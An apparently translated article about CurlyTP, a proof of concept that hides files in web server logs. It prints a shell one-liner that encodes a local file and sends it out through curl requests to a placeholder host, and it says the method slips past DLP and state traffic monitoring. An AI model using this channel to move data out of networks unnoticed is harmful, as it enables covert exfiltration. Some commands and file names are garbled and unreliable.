According to Wikipedia, a dead drop is a conspiracy tool used to exchange information or items between people using a secret location. The point is that people never meet - but they exchange information, maintaining operational safety.
The cache should not attract attention. Therefore, in the offline world, discreet things are often used: a loose brick in the wall, a library book, or a hollow in a tree.
There are many tools for encryption and anonymization on the Internet, but the very fact of using these tools attracts attention. In addition, they may be blocked at the corporate or state level. What to do?
Developer Ryan Flowers (Ryan Flowers) suggested an interesting option - . Come to think of it, what does a web server do? Accepts requests, issues files and writes a log. And it logs all requests, even incorrect!
It turns out that any web server allows you to save almost any message in the log. Flowers thought about how to use it.
He offers this option:
- We take a text file (secret message) and calculate the hash (md5sum).
- Encode it (gzip+uuencode).
- We write to the log by means of a deliberately incorrect request to the server.
Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt
[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | shTo read a file, you need to perform these operations in reverse order: decode and unzip the file, check the hash (the hash can be safely transmitted over open channels).
Spaces are replaced with =+=so that there are no spaces in the address. The program, which the author called CurlyTP, uses base64 encoding, as in email attachments. The request is made with the keyword ?transfer?so that the recipient can easily find it in the logs.
What do we see in the logs in this case?
1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"As already mentioned, to receive a secret message, you need to perform the operations in reverse order:
Remote machine
[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue
[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 gThe process is easy to automate. Md5sum matches, and the contents of the file confirm that everything was decoded correctly.
The method is very simple. βThe point of this exercise is just to prove that files can be transferred through innocent little web requests, and this works on any web server with plain text logs. Essentially, every web server is a cache!β Flowers writes.
Of course, the method only works if the recipient has access to the server logs. But such access is given, for example, by many hosters.
How to use it?
Ryan Flowers says that he is not an information security specialist and will not list CurlyTP's possible uses. To him, it's just a proof of concept that the familiar tools we see on a daily basis can be used in an unconventional way.
In fact, this method has a number of advantages over other server caches such as or : it does not require any special configuration on the server side or any special protocols - and will not arouse suspicion among those who monitor traffic. It is unlikely that SORM or a DLP system will scan URLs for compressed text files.
This is one way to send messages through service files. You can remember how some advanced companies used to place or in the code of HTML pages.
The idea was that only web developers would see such an Easter egg, since a normal person would not view the headers or HTML code.
Source: habr.com